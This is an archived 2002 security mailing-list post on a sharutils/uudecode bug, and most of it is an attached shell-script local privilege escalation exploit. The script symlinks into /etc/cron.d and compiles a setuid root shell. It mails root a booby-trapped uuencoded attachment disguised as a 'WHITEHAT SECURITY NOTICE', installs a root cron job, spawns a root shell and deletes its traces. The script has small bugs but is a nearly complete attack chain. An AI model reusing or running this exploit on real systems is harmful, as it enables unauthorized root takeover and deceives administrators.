lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: core at bokeoa.com (Charles 'core' Stevenson)
Subject: Sharutils buggy?

One small fix it should create the file with 666 perms ;)

Charles 'core' Stevenson wrote:
> Well you could check out some e-mail programs etc... Imagine that an 
> attacker sends e-mail to root@...e.host with a uuencoded attachment. The 
> attacker has local access to the machine and knows that root's e-mail 
> program calls system("uudecode %s",file) would allow the attacker to 
> setup the uuencode file in such a fashion as to make this work... 
> whether such a case exists is pure speculation. But out of boredom I've 
> attached a theorhetical exploit.
> 
> peace,
> core
> 
> martin f krafft wrote:
> 
>> I'd like to get some educated thoughts and opinions on a recently found
>> potential bug:
>>
>>   http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037
>>   http://online.securityfocus.com/bid/4742
>>   http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049
>>   http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033
>>   http://bugs.debian.org/149454
>>   http://www.kb.cert.org/vuls/id/336083
>>
>> cheers,
>>
> 
> 
> ------------------------------------------------------------------------
> 
> #!/bin/sh
> #
> # Conceptual uuencode + mailprogram privilege
> # local privilege escalation exploit
> #
> # Coded out of boredom...
> #
> # by Charles Stevenson <core@...eoa.com>
> #
> # Mon Jul 15 18:22:13 MDT 2002
> 
> target="/home/core/mymail" # Root's mail program that calls uudecode
> tempdir="/tmp"
> 
> if [ -u /.sushi ] ; then 
>     exec /.sushi
> fi
> 
> printf "Checking for $target..."
> if [ -f "$target" ] ; then 
>     echo "done."
> else
>     echo "NO!"
>     exit 1
> fi
> 
> if [ ! -d "$tempdir/core" ]; then
>     printf "Creating $tempdir/core..."
>     if ! mkdir "$tempdir/core" 2>/dev/null ; then
> 	echo "FAILED!" ; exit 1
>     fi
>     echo "done."
> fi
> 
> printf "Changing directory to $tempdir/core..."
> if ! cd "$tempdir/core" 2>/dev/null ; then 
>     echo "FAILED!" ; exit 1
> else
>     echo "done."
> fi
> 
> printf "Creating cron.d symlink..."
> if ! ln -fs /etc/cron.d/core you 2>/dev/null; then
>     echo "FAILED!" ; exit 1
> else
>     echo "done."
> fi
> 
> printf "Changing umask..."
> if ! umask 000 ; then
>     echo "FAILED!" ; exit 1
> else
>     echo "done."
> fi
> 
> printf "Compiling root shell..."
> cat >sushi.c <<EOF
> #include <unistd.h>
> int main (int argc, char **argv, char **envp) {
>     setuid(0); 
>     setgid(0); 
>     execve("/bin/sh",argv,envp);
>     return -1;
> }
> EOF
> if ! cc sushi.c -o sushi 2>/dev/null; then
>     echo "FAILED!" ; exit 1
> else
>     echo "done."
> fi
> 
> printf "Compiling cron takeover..."
> cat >takeover.c <<EOF
> #include <stdlib.h>
> main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); }
> EOF
> if ! cc takeover.c -o own 2>/dev/null; then
>     echo "FAILED!" ; exit 1
> fi
> echo "done."
> 
> printf "Performing attack... come back when root reads his e-mail..."
> cat >gosh <<EOF
> core
> EOF
> uuencode gosh /tmp/core/you > uuownme
> if mail-files root@...alhost ascii "WHITEHAT SECURITY NOTICE Your system was compromised. Attached is a tarball with details exlaining how." uuownme; then
>     echo "FAILED!"; exit 1
> fi
> echo "MESSAGE SENT!"
> 
> printf "Waiting for root to check his e-mail with $target..."
> while [ ! -u /etc/cron.d/core ] ; then
>     sleep 1; printf "."
> done
> echo "DONE!!!"
> 
> printf "Setting up evil cron job..."
> cat >croncore <<EOF
> */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi
> EOF
> if ! cat croncore 2>/dev/null >/etc/cron.d/core; then
>     echo "FAILED!" ; exit 1
> else
>     echo "done."
> fi
> 
> printf "Waiting for root shell"
> while [ ! -u /.sushi ] ; do
>     sleep 1 ; printf "."
> done
> echo "done."
> 
> cd /
> 
> printf "Cleaning up real quick..."
> if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then
>     echo "FAILED??? Fuck it!"
> else
>     echo "done."
> fi
> 
> echo "Spawning root shell!!! God Damn! I say GOD DAMN!!"
> if ! exec /.sushi -i; then
>     echo "Exec Failed!!! BUMMER!" ; exit 1
> fi

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ